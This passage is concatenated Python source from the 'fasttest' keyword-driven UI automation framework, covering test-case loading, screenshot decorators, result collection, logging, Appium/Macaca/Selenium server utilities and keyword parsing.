os.makedirs(os.path.join(Var.report, 'resource'))
def _analytical_testcase_file(self):
log_info('******************* analytical config *******************')
for configK, configV in self._config.items():
log_info(' {}: {}'.format(configK, configV))
log_info('******************* analytical testcase *******************')
testcase = TestCaseUtils()
self._testcase = testcase.test_case_path(Var.root, Var.test_case)
log_info(' case: {}'.format(len(self._testcase)))
for case in self._testcase:
log_info(' {}'.format(case))
def _analytical_common_file(self):
log_info('******************* analytical common *******************')
common_dir = os.path.join(Var.root, "Common")
for rt, dirs, files in os.walk(common_dir):
if rt == common_dir:
self._load_common_func(rt, files)
elif Var.desired_caps.platformName and (rt.split(os.sep)[-1].lower() == Var.desired_caps.platformName.lower()):
self._load_common_func(rt, files)
for commonk, commonv in Var.common_func.items():
log_info(' {}: {}'.format(commonk, commonv))
def _load_common_func(self,rt ,files):
for f in files:
if not f.endswith('yaml'):
continue
for commonK, commonV in analytical_file(os.path.join(rt, f)).items():
Var.common_func[commonK] = commonV
def _init_data(self):
data = analytical_file(os.path.join(Var.root, 'data.yaml'))
dict = Dict(data)
Var.extensions_var['variable'] = dict.variable
Var.extensions_var['resource'] = dict.resource
Var.extensions_var['keywords'] = dict.keywords
if not Var.extensions_var.variable:
Var.extensions_var['variable'] = Dict()
if not Var.extensions_var.resource:
Var.extensions_var['resource'] = Dict()
if not Var.extensions_var.keywords:
Var.extensions_var['keywords'] = Dict()
# 注册全局变量
log_info('******************* register variable *******************')
for key, value in Var.extensions_var.variable.items():
Var.extensions_var.variable[key] = value
log_info(' {}: {}'.format(key, value))
# 解析文件路径
log_info('******************* register resource *******************')
for resource, path in Var.extensions_var.resource.items():
resource_file = os.path.join(Var.root, path)
if not os.path.isfile(resource_file):
log_error('No such file or directory: {}'.format(resource_file), False)
continue
Var.extensions_var.resource[resource] = resource_file
log_info(' {}: {}'.format(resource, resource_file))
# 注册关键字
log_info('******************* register keywords *******************')
Var.default_keywords_data = keywords.return_keywords(Var.driver)
Var.new_keywords_data = Var.extensions_var.keywords
for key in Var.extensions_var.keywords:
log_info(' {}'.format(key))
def _init_testcase_suite(self):
self._suite = []
# 线程数大于用例数量时,取用例数
if 1 < self._index > len(self._testcase):
self._workers = len(self._testcase)
if self._index == len(self._testcase):
return
if self._workers > 1:
i = self._index
n = self._workers
l = len(self._testcase)
self._testcase = self._testcase[math.floor(i / n * l):math.floor((i + 1) / n * l)]
for case_path in self._testcase:
test_case = analytical_file(case_path)
test_case['test_case_path'] = case_path
Var.case_info = test_case
subsuite = unittest.TestLoader().loadTestsFromTestCase(RunCase)
self._suite.append(subsuite)
Var.case_info = None
def start(self):
if not self._suite:
return None
# 组装启动参数
log_info('******************* analytical desired capabilities *******************')
Var.desired_capabilities = Dict({
'driver': Var.driver.lower(),
'timeOut': Var.time_out,
'desired': Var.desired_caps,
'index': self._index,
'root': self._root
})
# 启动服务
if Var.driver != 'selenium':
server = ServerUtilsApp(Var.desired_capabilities)
Var.instance = server.start_server()
elif not Var.re_start:
server = ServerUtilsWeb(Var.desired_capabilities)
Var.instance = server.start_server()
DriverBaseWeb.init()
else:
server = None
# 用例运行
suite = unittest.TestSuite(tuple(self._suite))
runner = TestRunner()
runner.run(suite)
# 结束服务
if Var.driver != 'selenium':
server.stop_server()
elif not Var.re_start:
server.stop_server(Var.instance)
# 打印失败结果
if Var.all_result:
if Var.all_result.errorsList:
log_info(' Error case:')
for error in Var.all_result.errorsList:
log_error(error, False)
if Var.all_result.failuresList:
log_info(' Failed case:')
for failure in Var.all_result.failuresList:
log_error(failure, False)
return Var.all_result |
Hanlen520/fasttest | fasttest/common/decorator.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
try:
import cv2
except:
pass
import time
from fasttest.common import *
def mach_keywords(func, *args, **kwds):
def wrapper(*args, **kwds):
start_time = time.time()
result = None
try:
if args or kwds:
result = func(*args, **kwds)
else:
result = func()
except Exception as e:
Var.case_snapshot_index += 1
Var.exception_flag = False
snapshot_index = Var.case_snapshot_index
imagename = "Step_{}.png".format(snapshot_index)
file = os.path.join(Var.snapshot_dir, imagename)
action_step = args[1]
style = args[-1]
try:
Var.instance.save_screenshot(file)
except:
log_error(' screenshot failed!', False)
stop_time = time.time()
duration = str('%.2f' % (stop_time - start_time))
# call action中某一语句抛出异常,会导致call action状态也是false,需要处理
status = False
if Var.exception_flag:
status = True
Var.test_case_steps[snapshot_index] = {
'index': snapshot_index,
'status': status,
'duration': duration,
'snapshot': file,
'step': f'{style}- {action_step}',
'result': result if result is not None else ''
}
raise e
return result
return wrapper
def executor_keywords(func, *args, **kwds):
def wrapper(*args, **kwds):
result = None
exception_flag = False
exception = None
Var.ocrimg = None
start_time = time.time()
Var.case_snapshot_index += 1
Var.exception_flag = False
snapshot_index = Var.case_snapshot_index
imagename = "Step_{}.png".format(snapshot_index)
file = os.path.join(Var.snapshot_dir, imagename)
action_step = args[-2].step
style = args[-1]
try:
if args or kwds:
result = func(*args, **kwds)
else:
result = func()
except Exception as e:
exception = e
exception_flag = True
finally:
try:
if Var.ocrimg is not None:
# matchImage,绘制图片
cv2.imwrite(file, Var.ocrimg)
Var.ocrimg = None
elif Var.save_screenshot:
# 全局参数
Var.instance.save_screenshot(file)
elif not Var.exception_flag and exception_flag:
# call出现异常
Var.instance.save_screenshot(file)
except:
Var.ocrimg = None
log_error(' screenshot failed!', False)
# 步骤执行时间
stop_time = time.time()
duration = str('%.2f' % (stop_time - start_time))
# 步骤执行结果
if result is not None:
action_result = f'{result}'.replace("<", "{").replace(">", "}")
else:
action_result = ''
# call action中某一语句抛出异常,会导致call action状态也是false,需要处理
status = not exception_flag
if Var.exception_flag:
status = True
Var.test_case_steps[snapshot_index] = {
'index': snapshot_index,
'status': status,
'duration': duration,
'snapshot': file,
'step': f'{style}- {action_step}',
'result': action_result
}
if exception_flag:
raise exception
return result
return wrapper |
Hanlen520/fasttest | fasttest/utils/__init__.py | <reponame>Hanlen520/fasttest
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fasttest.utils.yaml_utils import analytical_file
from fasttest.utils.devices_utils import DevicesUtils
from fasttest.utils.opcv_utils import OpencvUtils
from fasttest.utils.server_utils_app import ServerUtilsApp
from fasttest.utils.server_utils_web import ServerUtilsWeb
from fasttest.utils.testcast_utils import TestCaseUtils
__all__ = ['analytical_file', 'DevicesUtils', 'OpencvUtils', 'ServerUtilsApp', 'ServerUtilsWeb', 'TestCaseUtils'] |
Hanlen520/fasttest | fasttest/result/test_result.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import unittest
import collections
from fasttest.common import *
class TestInfo(object):
"""
This class keeps useful information about the execution of a
test method.
"""
# Possible test outcomes
(SUCCESS, FAILURE, ERROR, SKIP) = range(4)
def __init__(self, test_method, status=SUCCESS, err=None):
self.status = status
self.elapsed_time = 0
self.start_time = 0
self.stop_time = 0
self.err = err
self.report = None
self.case_path = test_method.test_case_path
self.data_id = test_method.test_case_path.split('/')[-1].split(os.sep)[-1].split(".")[0]
self.case_name = test_method.test_case_path.split('/')[-1].split(os.sep)[-1].split(".")[0]
self.snapshot_dir = test_method.snapshot_dir
self.module_name = test_method.module
self.description = test_method.description
self.test_case_steps = {}
class TestResult(unittest.TextTestResult):
def __init__(self,stream, descriptions, verbosity):
super(TestResult,self).__init__(stream,descriptions,verbosity)
self.stream = stream
self.showAll = verbosity > 1
self.descriptions = descriptions
self.result = collections.OrderedDict()
self.successes = []
self.testinfo = None
def _save_output_data(self):
'''
:return:
'''
try:
self._stdout_data = Var.case_message
Var.case_message = ""
Var.case_step_index = 0
Var.case_snapshot_index = 0
except AttributeError as e:
pass
def startTest(self, test):
'''
:param test:
:return:
'''
super(TestResult,self).startTest(test)
self.start_time = time.time()
Var.test_case_steps = {}
Var.is_debug = False
def stopTest(self, test):
'''
:param test:
:return:
'''
self._save_output_data()
unittest.TextTestResult.stopTest(self,test)
self.stop_time = time.time()
self.report = test.report
self.testinfo.start_time = self.start_time
self.testinfo.stop_time = self.stop_time
self.testinfo.report = self.report
self.testinfo.test_case_steps = Var.test_case_steps
if test.module not in self.result.keys():
self.result[test.module] = []
self.result[test.module].append(self.testinfo)
self.testinfo = None
Var.test_case_steps = {}
Var.is_debug = False
def addSuccess(self, test):
'''
:param test:
:return:
'''
super(TestResult,self).addSuccess(test)
self._save_output_data()
self.testinfo = TestInfo(test, TestInfo.SUCCESS)
self.successes.append(test)
def addError(self, test, err):
'''
:param test:
:return:
'''
super(TestResult,self).addError(test,err)
self._save_output_data()
_exc_str = self._exc_info_to_string(err, test)
self.testinfo = TestInfo(test, TestInfo.ERROR, _exc_str)
log_error(' case: {}'.format(self.testinfo.case_path), False)
log_error(_exc_str, False)
def addFailure(self, test, err):
'''
:param test:
:return:
'''
super(TestResult,self).addFailure(test,err)
self._save_output_data()
_exc_str = self._exc_info_to_string(err, test)
self.testinfo = TestInfo(test, TestInfo.FAILURE, _exc_str)
log_error(' case: {}'.format(self.testinfo.case_path), False)
log_error(_exc_str, False)
def addSkip(self, test, reason):
'''
:param test:
:return:
'''
super(TestResult,self).addSkip(test,reason)
self._save_output_data()
self.testinfo = TestInfo(test, TestInfo.SKIP)
def addExpectedFailure(self, test, err):
'''
:param test:
:param err:
:return:
'''
super(TestResult, self).addFailure(test, err)
self._save_output_data()
_exc_str = self._exc_info_to_string(err, test)
self.testinfo = TestInfo(test, TestInfo.FAILURE, _exc_str)
log_error(' case: {}'.format(self.testinfo.case_path), False)
log_error(_exc_str, False)
|
Hanlen520/fasttest | fasttest/common/__init__.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fasttest.common.dict import Dict, DictEncoder
from fasttest.common.variable_global import Var
from fasttest.common.log import log_info, log_error
__all__ = ['log_info','log_error','Var', 'Dict', 'DictEncoder']
|
Hanlen520/fasttest | fasttest/utils/server_utils_app.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import time
import random
import platform
import threading
import subprocess
from fasttest.common import *
class ServerUtilsApp(object):
def __getattr__(self, item):
try:
return self.__getattribute__(item)
except:
return None
def __init__(self, desired_capabilities):
self.instance = None
self.driver = desired_capabilities.driver
self.time_out = desired_capabilities.timeOut
self.url = 'http://127.0.0.1'
self.desired_capabilities = self._check_desired_capabilities(desired_capabilities.desired)
self.port = self._get_device_port()
self.browser = desired_capabilities.browser
def start_server(self):
try:
log_info('Start the server...')
self.stop_server()
if self.driver == 'appium':
bp_port = self._get_device_port()
wda_port = self._get_device_port()
udid = self.desired_capabilities['udid']
p = f'appium ' \
f'-a 127.0.0.1 ' \
f'-p {self.port} ' \
f'-U {udid} ' \
f'-bp {bp_port} ' \
f'--webdriveragent-port {wda_port} ' \
f'--session-override ' \
f'--log-level info'
self.pipe = subprocess.Popen(p, stdout=subprocess.PIPE, shell=True)
thread = threading.Thread(target=self._print_appium_log)
thread.start()
time.sleep(5)
from appium import webdriver
self.instance = webdriver.Remote(command_executor='{}:{}/wd/hub'.format(self.url, self.port),
desired_capabilities=self.desired_capabilities)
self.instance.implicitly_wait(int(self.time_out))
else:
ob = subprocess.Popen('macaca server -p {}'.format(self.port), stdout=subprocess.PIPE, shell=True)
for out_ in ob.stdout:
out_ = str(out_, encoding='utf-8')
log_info(out_.strip())
if 'Macaca server started' in out_: break
from macaca import WebDriver
self.instance = WebDriver(url='{}:{}/wd/hub'.format(self.url, self.port),
desired_capabilities=self.desired_capabilities)
self.instance.init()
return self.instance
except Exception as e:
log_error('Unable to connect to the server, please reconnect!', False)
if self.platformName.lower() == "android":
if self.driver == 'macaca':
os.system('adb uninstall io.appium.uiautomator2.server')
os.system('adb uninstall io.appium.uiautomator2.server.test')
else:
os.system('adb uninstall com.macaca.android.testing')
os.system('adb uninstall com.macaca.android.testing.test')
os.system('adb uninstall xdf.android_unlock')
self.stop_server()
raise e
def stop_server(self):
try:
if self.platformName.lower() == "android":
os.system('adb -s {} shell am force-stop {}'.format(self.udid,
self.package if self.package else self.appPackage))
elif self.platformName.lower() == "ios":
pass
try:
self.instance.quit()
except:
pass
if self.port is not None:
result, pid = self._check_port_is_used(self.port)
if result:
p = platform.system()
if p == "Windows":
sys_command = "taskkill /pid %s -t -f" % pid
info = subprocess.check_output(sys_command)
log_info(str(info, encoding='GB2312'))
elif p == "Darwin" or p == "Linux":
sys_command = "kill -9 %s" % pid
os.system(sys_command)
except Exception as e:
raise e
def _check_desired_capabilities(self, desired_capabilities):
desired_capabilities_dict = {}
for key, value in desired_capabilities.items():
if self.driver == 'appium':
if key in ['package', 'appPackage']:
key = 'appPackage'
elif key in ['activity', 'appActivity']:
key = 'appActivity'
else:
if key in ['package', 'appPackage']:
key = 'package'
elif key in ['activity', 'appActivity']:
key = 'activity'
if isinstance(value, Dict):
value_dict = {}
for key_, value_ in value.items():
value_dict[key_] = value_
value = value_dict
desired_capabilities_dict[key] = value
log_info(' {}: {}'.format(key, value))
object.__setattr__(self, key, value)
return desired_capabilities_dict
def _check_port_is_used(self, port):
p = platform.system()
if p == 'Windows':
sys_command = "netstat -ano|findstr %s" % port
pipe = subprocess.Popen(sys_command, stdout=subprocess.PIPE, shell=True)
out, error = pipe.communicate()
if str(out, encoding='utf-8') != "" and "LISTENING" in str(out, encoding='utf-8'):
pid = re.search(r"\s+LISTENING\s+(\d+)\r\n", str(out, encoding='utf-8')).groups()[0]
return True, pid
else:
return False, None
elif p == 'Darwin' or p == 'Linux':
sys_command = "lsof -i:%s" % port
pipe = subprocess.Popen(sys_command, stdout=subprocess.PIPE, shell=True)
for line in pipe.stdout.readlines():
if "LISTEN" in str(line, encoding='utf-8'):
pid = str(line, encoding='utf-8').split()[1]
return True, pid
return False, None
else:
log_error('The platform is {} ,this platform is not support.'.format(p))
def _get_device_port(self):
for i in range(10):
port = random.randint(3456, 9999)
result, pid = self._check_port_is_used(port)
if result:
continue
else:
log_info('get port return {}'.format(port))
return port
return 3456
def _print_appium_log(self):
log_tag = False
while True:
out = self.pipe.stdout.readline()
out = str(out, encoding='utf-8').strip()
if 'Appium REST http interface' in out:
log_tag = True
log_info(out)
elif out:
if not log_tag:
log_info(out)
else:
break
|
Hanlen520/fasttest | setup.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#############################################
# File Name: setup.py
# Author: IMJIE
# Email: <EMAIL>
# Created Time: 2020-1-29
#############################################
import sys
import setuptools
with open("README.md", "r", encoding='UTF-8') as fh:
long_description = fh.read()
info = sys.version_info
if info.major == 3 and info.minor <= 7:
requires = [
'PyYAML>=5.1.2',
'wd>=1.0.1',
'selenium',
'colorama',
'opencv-contrib-python==3.4.2.16'
]
else:
requires = [
'PyYAML>=5.1.2',
'wd>=1.0.1',
'selenium',
'colorama',
'opencv-contrib-python'
]
setuptools.setup(
name="fasttest",
version="1.0.0",
author="IMJIE",
author_email="<EMAIL>",
keywords=('macaca', 'appium', 'selenium', 'APP自动化', 'WEB自动化', '关键字驱动'),
description="关键字驱动自动化框架",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Jodeee/fasttest",
packages=setuptools.find_packages(),
include_package_data=True,
package_data={'fasttest/result':['resource/*']},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
],
python_requires='>=3.6',
install_requires=requires,
entry_points={
'console_scripts':[
'fasttest = fasttest.fasttest_runner:main'
]
}
) |
Hanlen520/fasttest | fasttest/common/dict.py | <filename>fasttest/common/dict.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import collections
try:
from appium.webdriver import WebElement
except:
pass
try:
from macaca.webdriver import WebElement
except:
pass
class Dict(collections.UserDict):
def __missing__(self, key):
return None
def __contains__(self, item):
return str(item) in self.data
def __setitem__(self, key, value):
if isinstance(value,dict):
_item = Dict()
for _key ,_value in value.items():
_item[_key] = _value
self.data[str(key)] = _item
else:
self.data[str(key)] = value
def __getattr__(self, item):
if item in self:
return self[str(item)]
else:
return None
def __copy__(self):
n_d = type(self)()
n_d.__dict__.update(self.__dict__)
return n_d
class DictEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Dict):
d = {}
for k, v in obj.items():
d[k] = v
return d
elif isinstance(obj, WebElement):
return str(obj)
else:
return json.JSONEncoder.default(self, obj)
|
Hanlen520/fasttest | fasttest/common/log.py | <filename>fasttest/common/log.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import datetime
import platform
from colorama import init, Fore, Back, Style
from fasttest.common import *
logger = None
if platform.system() != 'Windows':
init(wrap=True)
init(autoreset=True)
def write(message):
try:
log_file_path = os.path.join(Var.report, "project.log")
with open(log_file_path, 'a+', encoding='UTF-8') as f:
f.write(f'{message}\n')
except:
pass
def log_info(message,color=None):
format_str = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S INFO :")
if not isinstance(message, str):
message = str(message)
if color:
print(format_str + color + message)
else:
print(format_str + message)
write(format_str + message)
def log_error(message, exit=True):
format_str = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ERROR :")
print(format_str + Fore.RED + message)
write(format_str + message)
if exit:
os._exit(0)
|
Hanlen520/fasttest | fasttest/utils/server_utils_web.py | <reponame>Hanlen520/fasttest
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from selenium import webdriver
from fasttest.common import *
class ServerUtilsWeb(object):
def __getattr__(self, item):
try:
return self.__getattribute__(item)
except:
return None
def __init__(self, desired_capabilities):
self.instance = None
self.driver = desired_capabilities.driver
self.time_out = desired_capabilities.timeOut
self.desired_capabilities = desired_capabilities.desired
self.index = desired_capabilities.index
self.root = desired_capabilities.root
self.browser = self.desired_capabilities.browser
self.max_window = self.desired_capabilities.maxWindow
# hub url
remote_url = self.desired_capabilities.remoteUrl
if remote_url and isinstance(remote_url, str):
self.remote_url = remote_url if self.index == 0 else None
elif remote_url and isinstance(remote_url, list):
self.remote_url = remote_url[self.index] if self.index < len(remote_url) else None
else:
self.remote_url = None
# driver path
if self.desired_capabilities[self.browser] and 'driver' in self.desired_capabilities[self.browser].keys():
self.driver_path = self.desired_capabilities[self.browser]['driver']
if not os.path.isfile(self.driver_path):
self.driver_path = os.path.join(self.root, self.driver_path)
else:
self.driver_path = None
# options
if self.desired_capabilities[self.browser] and 'options' in self.desired_capabilities[self.browser].keys():
self.options = self.desired_capabilities[self.browser]['options']
else:
self.options = None
def start_server(self):
try:
if self.browser == 'chrome':
options = webdriver.ChromeOptions()
if self.options:
for opt in self.options:
options.add_argument(opt)
if self.remote_url:
self.instance = webdriver.Remote(command_executor=self.remote_url,
desired_capabilities={
'platform': 'ANY',
'browserName': self.browser,
'version': '',
'javascriptEnabled': True
},
options=options)
else:
if self.driver_path:
self.instance = webdriver.Chrome(executable_path=self.driver_path,
chrome_options=options)
else:
self.instance = webdriver.Chrome(chrome_options=options)
elif self.browser == 'firefox':
options = webdriver.FirefoxOptions()
if self.options:
for opt in self.options:
options.add_argument(opt)
if self.remote_url:
self.instance = webdriver.Remote(command_executor=self.remote_url,
desired_capabilities={
'platform': 'ANY',
'browserName': self.browser,
'version': '',
'javascriptEnabled': True
},
options=options)
else:
if self.driver_path:
self.instance = webdriver.Firefox(executable_path=self.driver_path,
firefox_options=options)
else:
self.instance = webdriver.Firefox(firefox_options=options)
elif self.browser == 'edge':
if self.driver_path:
self.instance = webdriver.Edge(executable_path=self.driver_path)
else:
self.instance = webdriver.Edge()
elif self.browser == 'safari':
self.instance = webdriver.Safari()
elif self.browser == 'ie':
if self.driver_path:
self.instance = webdriver.Ie(executable_path=self.driver_path)
else:
self.instance = webdriver.Ie()
elif self.browser == 'opera':
if self.driver_path:
self.instance = webdriver.Opera(executable_path=self.driver_path)
else:
self.instance = webdriver.Opera()
elif self.browser == 'phantomjs':
if self.driver_path:
self.instance = webdriver.PhantomJS(executable_path=self.driver_path)
else:
self.instance = webdriver.PhantomJS()
if self.max_window:
self.instance.maximize_window()
return self.instance
except Exception as e:
raise e
def stop_server(self, instance):
try:
instance.quit()
except:
pass
|
Hanlen520/fasttest | fasttest/runner/action_analysis.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import json
from colorama import Fore, Back, Style
from fasttest.common import Var, Dict, log_info
from fasttest.common.decorator import mach_keywords, executor_keywords
from fasttest.runner.action_executor_app import ActionExecutorApp
from fasttest.runner.action_executor_web import ActionExecutorWeb
class ActionAnalysis(object):
def __init__(self):
self.variables = {}
self.for_variables = {}
if Var.driver != 'selenium':
self.action_executor = ActionExecutorApp()
else:
self.action_executor = ActionExecutorWeb()
def _get_variables(self, name):
'''
获取变量
:param name:
:return:
'''
if not re.match(r'^\${(\w+)}$', name):
raise NameError("name '{}' is not defined".format(name))
name = name[2:-1]
if name in self.for_variables.keys():
object_var = self.for_variables[name]
elif name in self.variables:
object_var = self.variables[name]
elif name in self.common_var.keys():
object_var = self.common_var[name]
elif name in Var.extensions_var.variable.keys():
object_var = Var.extensions_var.variable[name]
elif name in Var.extensions_var.resource.keys():
object_var = Var.extensions_var.resource[name]
else:
raise NameError("name '{}' is not defined".format(name))
return object_var
def _replace_string(self, content):
"""
字符串替换
:param content:
:return:
"""
if isinstance(content, str):
if re.match(r"^'(.*)'$", content):
content = '"{}"'.format(content)
elif re.match(r'^"(.*)"$', content):
content = "'{}'".format(content)
else:
content = '"{}"'.format(content)
else:
content = str(content)
return content
def _get_replace_string(self, content):
'''
:param content:
:return:
'''
pattern_content = re.compile(r'(\${\w+}+)')
while True:
if isinstance(content, str):
search_contains = re.search(pattern_content, content)
if search_contains:
search_name = self._get_variables(search_contains.group())
if search_name is None:
search_name = 'None'
elif isinstance(search_name, str):
if re.search(r'(\'.*?\')', search_name):
search_name = '"{}"'.format(search_name)
elif re.search(r'(".*?")', search_name):
search_name = '\'{}\''.format(search_name)
else:
search_name = '"{}"'.format(search_name)
else:
search_name = str(search_name)
content = content[0:search_contains.span()[0]] + search_name + content[search_contains.span()[1]:]
else:
break
else:
content = str(content)
break
return content
def _get_params_type(self, param):
'''
获取参数类型
:param param:
:return:
'''
if re.match(r"^'(.*)'$", param):
param = param.strip("'")
elif re.match(r'^"(.*)"$', param):
param = param.strip('"')
elif re.match(r'(^\${\w+}?$)', param):
param = self._get_variables(param)
elif re.match(r'(^\${\w+}?\[.+\]$)', param):
index = param.index('}[')
param_value = self._get_variables(param[:index+1])
key = self._get_params_type(param[index + 2:-1])
try:
param = param_value[key]
except Exception as e:
raise SyntaxError('{}: {}'.format(param, e))
else:
param = self._get_eval(param.strip())
return param
def _get_eval(self, str):
'''
:param parms:
:return:
'''
try:
str = eval(str)
except:
str = str
return str
def _get_parms(self, parms):
'''
获取参数,传参()形式
:param parms:
:return:
'''
parms = parms.strip()
if re.match('^\(.*\)$', parms):
params = []
pattern_content = re.compile(r'(".*?")|(\'.*?\')|(\${\w*?}\[.*?\])|(\${\w*?})|,| ')
find_content = re.split(pattern_content, parms[1:-1])
find_content = [x.strip() for x in find_content if x]
for param in find_content:
var_content = self._get_params_type(param)
params.append(var_content)
return params
else:
raise SyntaxError(parms)
def _analysis_exist_parms_keywords(self, step):
key = step.split('(', 1)[0].strip()
parms = self._get_parms(step.lstrip(key))
action_data = Dict({
'key': key,
'parms': parms,
'step': step
})
return action_data
def _analysis_not_exist_parms_keywords(self, step):
key = step
parms = None
action_data = Dict({
'key': key,
'parms': parms,
'step': step
})
return action_data
def _analysis_variable_keywords(self, step):
step_split = step.split('=', 1)
if len(step_split) != 2:
raise SyntaxError(f'"{step}"')
elif not step_split[-1].strip():
raise SyntaxError(f'"{step}"')
name = step_split[0].strip()[2:-1]
var_value = step_split[-1].strip()
if re.match(r'\$\.(\w)+\(.*\)', var_value):
key = var_value.split('(', 1)[0].strip()
if key == '$.id':
parms = [self._get_replace_string(var_value.split(key, 1)[-1][1:-1])]
else:
parms = self._get_parms(var_value.split(key, 1)[-1])
elif re.match(r'(\w)+\(.*\)', var_value):
key = var_value.split('(', 1)[0].strip()
parms = self._get_parms(var_value.lstrip(key))
else:
key = None
parms = [self._get_params_type(var_value)]
action_data = Dict({
'key': 'variable',
'parms': parms,
'name': name,
'func': key,
'step': step
})
return action_data
def _analysis_common_keywords(self, step, style):
key = step.split('call', 1)[-1].strip().split('(', 1)[0].strip()
parms = step.split('call', 1)[-1].strip().split(key, 1)[-1]
parms = self._get_parms(parms)
action_data = Dict({
'key': 'call',
'parms': parms,
'func': key,
'style': style,
'step': step
})
return action_data
def _analysis_other_keywords(self, step):
key = step.split(' ', 1)[0].strip()
parms = self._get_replace_string(step.lstrip(key).strip())
action_data = Dict({
'key': key,
'parms': [parms],
'step': f'{key} {parms}'
})
return action_data
def _analysis_for_keywords(self, step):
f_p = re.search(r'for\s+(\$\{\w+\})\s+in\s+(\S+)', step)
f_t = f_p.groups()
if len(f_t) != 2:
raise SyntaxError(f'"{step}"')
# 迭代值
iterating = f_t[0][2:-1]
# 迭代对象
parms = self._get_params_type(f_t[1])
action_data = Dict({
'key': 'for',
'parms': [parms],
'value': iterating,
'step': f'for {f_t[0]} in {self._get_params_type(f_t[1])}'
})
return action_data
@mach_keywords
def _match_keywords(self, step, style):
if re.match(' ', step):
raise SyntaxError(f'"{step}"')
step = step.strip()
if re.match(r'\w+\((.*)\)', step):
return self._analysis_exist_parms_keywords(step)
elif re.match(r'^\w+$', step):
return self._analysis_not_exist_parms_keywords(step)
elif re.match(r'\$\{\w+\}=|\$\{\w+\} =', step):
return self._analysis_variable_keywords(step)
elif re.match(r'call \w+\(.*\)', step):
return self._analysis_common_keywords(step, style)
elif re.match(r'if |elif |while |assert .+', step):
return self._analysis_other_keywords(step)
elif re.match(r'for\s+(\$\{\w+\})\s+in\s+(\S+)+', step):
return self._analysis_for_keywords(step)
else:
raise SyntaxError(step)
@executor_keywords
def executor_keywords(self, action, style):
try:
if action.key in Var.default_keywords_data:
result = self.action_executor._action_executor(action)
elif action.key in Var.new_keywords_data:
result = self.action_executor._new_action_executo(action)
else:
raise NameError("'{}' is not defined".format(action.key))
if action.key == 'variable':
# 变量赋值
self.variables[action.name] = result
return result
except Exception as e:
raise e
def action_analysis(self, step, style, common, iterating_var):
'''
@param step: 执行步骤
@param style: 缩进
@param common: call 所需参数
@param iterating_var: for 迭代值
@return:
'''
log_info(' {}'.format(step), Fore.GREEN)
if not iterating_var:
self.for_variables = {}
else:
self.for_variables.update(iterating_var)
log_info(' --> {}'.format(self.for_variables))
self.common_var = common
# 匹配关键字、解析参数
action_dict = self._match_keywords(step, style)
log_info(' --> key: {}'.format(action_dict['key']))
log_info(' --> value: {}'.format(action_dict['parms']))
# 执行关键字
result = self.executor_keywords(action_dict, style)
return result
if __name__ == '__main__':
action = ActionAnalysis()
|
Hanlen520/fasttest | fasttest/runner/action_executor_web.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import time
import datetime
from selenium.webdriver.remote.webelement import WebElement
from selenium.common.exceptions import JavascriptException
from fasttest.common import Var
from fasttest.common.check import check
from fasttest.drivers.driver_base_web import DriverBaseWeb
from fasttest.utils.opcv_utils import OpencvUtils
from fasttest.runner.action_executor_base import ActionExecutorBase
class ActionExecutorWeb(ActionExecutorBase):
def _openUrl(self, action):
'''
:param action:
:return:
'''
url = self._getParms(action, 0)
DriverBaseWeb.open_url(url)
def _close(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.close()
def _quit(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.quit()
@check
def _submit(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.submit(element)
def _back(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.back()
def _forward(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.forward()
def _refresh(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.refresh()
def _queryDisplayed(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
if isinstance(parms, WebElement):
element = parms
DriverBaseWeb.query_displayed(element=element, timeout=Var.time_out)
elif isinstance(parms, str):
if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
parms.strip(), re.I):
raise TypeError('input parameter format error:{}'.format(parms))
key = parms.split('=', 1)[0].strip()
value = parms.split('=', 1)[-1].strip()
DriverBaseWeb.query_displayed(type=key, text=value, timeout=Var.time_out)
else:
raise TypeError('the parms type must be: WebElement or str')
def _queryNotDisplayed(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
if isinstance(parms, WebElement):
element = parms
DriverBaseWeb.query_not_displayed(element=element, timeout=Var.time_out)
elif isinstance(parms, str):
if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
parms.strip(), re.I):
raise TypeError('input parameter format error:{}'.format(parms))
key = parms.split('=', 1)[0].strip()
value = parms.split('=', 1)[-1].strip()
DriverBaseWeb.query_not_displayed(type=key, text=value, timeout=Var.time_out)
else:
raise TypeError('the parms type must be: WebElement or str')
@check
def _click(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.click(element)
@check
def _check(self, action):
'''
:param action:
:return:
'''
self._getElement(action)
@check
def _contextClick(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.context_click(element)
@check
def _doubleClick(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.double_click(element)
@check
def _holdClick(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.click_and_hold(element)
@check
def _dragDrop(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action, 0)
target = self._getElement(action, 1)
DriverBaseWeb.drag_and_drop(element, target)
@check
def _dragDropByOffset(self, action):
'''
:param action:
